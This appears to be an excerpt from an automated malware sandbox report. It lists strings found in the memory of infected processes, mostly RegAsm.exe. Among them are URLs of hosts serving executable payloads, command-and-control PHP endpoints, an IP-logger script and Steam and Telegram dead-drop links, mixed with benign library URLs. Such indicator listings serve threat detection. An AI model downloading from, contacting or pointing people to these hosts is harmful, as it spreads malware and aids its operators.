Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exeC:
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exeCZ96nQr
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exeiH
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d707730e9bf_s.exe#space
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d707730e9bf_s.exe#spaceC:
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d707730e9bf_s.exe#spaceW-
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d707730e9bf_s.exe#spacecryptol
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d707730e9bf_s.exe#spacers
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d707730e9bf_s.exe#spacexin)HS
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003DCE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d70775c548d_v.exe#space
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d70775c548d_v.exe#spaceC:
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d70775c548d_v.exe#spaceE-
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d70775c548d_v.exe#spacell
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d70e8640404_trics.exe
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d70e8640404_trics.exeC:
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d70e8640404_trics.exee
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003DCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d70e8640404_trics.exee.
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d70e8640404_trics.exeeYH
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d70e8640404_trics.exely.
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d70e8640404_trics.exemN-
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d70e8640404_trics.exeo.
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exe
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exeC:
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exeK
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exeQH
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exea-
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exeeO
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003DCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exev
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66d58b1858bcb_crypted.exe#xin
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66d58b1858bcb_crypted.exe#xinC:
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66d58b1858bcb_crypted.exe#xinJs
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66d58b1858bcb_crypted.exe#xinto
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2425361902.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upus
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upus0DVJtBG
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upus;
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upusB9b
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upusC:
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upusce
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upusm
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upusmt
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66d60cd3ce002_SeparatelyDied.exe#sun
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66d60cd3ce002_SeparatelyDied.exe#sun2658-3693405117-2476756634-1003
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66d60cd3ce002_SeparatelyDied.exe#sun3
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66d60cd3ce002_SeparatelyDied.exe#sun3tn?
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66d60cd3ce002_SeparatelyDied.exe#sun?
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66d60cd3ce002_SeparatelyDied.exe#sunC:
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66d72df86b9f3_crypted.exe#1
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66d72df86b9f3_crypted.exe#1C:
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66d72df86b9f3_crypted.exe#1Zs
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66d72df86b9f3_crypted.exe#1yHc
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66d72df86b9f3_crypted.exe#1yy3GtoRvFKon$
Source: DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80
Source: DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80hellohttps://t.me/edm0di11iMozilla/5.0
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2425361902.0000000003D40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://154.216.17.178/edge/msconfig32.exe#pend
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://154.216.17.178/edge/msconfig32.exe#pendC:
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://154.216.17.178/edge/msconfig32.exe#pendXOp
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2425361902.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.111.174.109/bobr
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.111.174.109/bobr1
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.111.174.109/bobrC:
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.111.174.109/bobrJ
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.111.174.109/bobrb
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.00000000014E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.00000000014E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/6
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp, kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.00000000014E8000.00000004.00000020.00020000.00000000.sdmp, kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php/
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php2
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.00000000014E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpF
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.00000000014E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpZ
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.00000000014E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpb
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpt
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003DDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://240902180529931.tyr.zont16.com/
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://240902180529931.tyr.zont16.com/f/fikbam0902931.exe
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://240902180529931.tyr.zont16.com/f/fikbam0902931.exeC:
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://240902180529931.tyr.zont16.com/f/fikbam0902931.exeDpP
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2425361902.0000000003D4F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2425361902.0000000003D49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.9/nokia/lamp.exe
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.9/nokia/lamp.exeC:
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.9/nokia/lamp.exeyE
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.9/nokia/lamp.exeyJ
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.133.61.172/
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.133.61.172/7O
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.133.61.172/api/crazyfish.php
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.133.61.172/api/twofish.php
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.133.61.172/api/twofish.php(
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.133.61.172/api/twofish.php:
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.133.61.172/l
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.133.61.172:80/api/crazyfish.php
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.133.61.172:80/api/twofish.php
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.133.61.172:80/api/twofish.php_
Source: DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://gacan.zapto.org_DEBUG.zip/c
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2388267970.0000000001344000.00000008.00000001.01000000.00000012.sdmp, m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000002.2664396294.000000000134D000.00000008.00000001.01000000.00000012.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: RegAsm.exe	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004FD3000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004C21000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2419695402.000000000056B000.00000040.00000400.00020000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDllm_object
Source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.datamarket.azure.com/data.ashx/
Source: xNc0eiwaHinah8TaPUA3TuXZ.exe, 00000008.00000002.2611175093.00000000033C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api64.ipify.org/
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api64.ipify.org/?format=json
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api64.ipify.org:443/?format=json
Source: BitLockerToGo.exe, 00000025.00000002.2666627496.00000000031B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://condedqpwqm.shop/api)M
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://datalake.azure.net/https://api.loganalytics.iohttps://graph.microsoft.us/https://api.loganal
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://datamarket.azure.com/embedded/catalog?client_id=
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://datamarket.azure.com/embedded/consent?client_id=
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://datamarket.azure.com/embedded/query?client_id=
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://datamarket.azure.com/embedded/resultrhttps://datamarket.accesscontrol.windows.net/v2/OAuth2-
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file-link-iota.vercel.app/
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file-link-iota.vercel.app/4
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file-link-iota.vercel.app/download
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file-link-iota.vercel.app/downloadC:
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file-link-iota.vercel.app/downloadT
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file-link-iota.vercel.app/downloadU
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file-link-iota.vercel.app/downloadd
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file-link-iota.vercel.app:80/download
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file-link-iota.vercel.app:80/downloadynamic
Source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000000.2385160822.0000000000BB2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://github.com/dotnet/wpf
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://github.com/go-sql-driver/mysql/wiki/old_passwords0001020304050607080910111213141516171819202
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://github.com/go-sql-driver/mysql/wiki/strict-modepkcs7:
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://github.com/golang/protobuf/issues/1609):
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004FD3000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004C21000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2419695402.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/https://ipgeolocation.io/::
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33EK
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33R
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io:443/widget/demo/8.46.123.33
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/-
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003DCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1nhuM4.js
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1nhuM4.js4
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/X~
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org:443/1nhuM4.jsrosoft
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://manage.windowsazure.com/publishsettings/indextls:
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://manage.windowsazure.us/publishsettings/indexcrypto/rsa:
Source: DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199768374681
Source: DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199768374681i11ihttps://t.me/edm0dMozilla/5.0
